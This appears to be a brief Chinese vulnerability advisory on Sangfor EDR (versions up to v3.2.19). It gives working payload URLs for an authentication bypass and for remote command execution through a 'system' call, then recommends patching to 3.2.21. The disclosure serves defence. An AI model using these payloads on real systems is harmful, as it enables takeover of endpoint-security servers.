目录
深信服 EDR 终端检测响应平台 0day RCE 漏洞
描述
深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。
影响
攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。漏洞影响版本<=v3.2.19。
任意用户登录
https://ip:xx/ui/login.php?user=任意用户名
RCE
payload:
https://xxx.xxx/tool/log/c.php?strip_slashes=system&host=whoami
【修复建议】
官方已发布更新版本和修复补丁,用户只需更新至3.2.21版本或升级补丁可修复该漏洞。
针对深信服EDR系统近期出现的大量漏洞,建议系统使用方运营者及时自查,发现存在漏洞后,按照漏洞处置建议及时进行加固处置。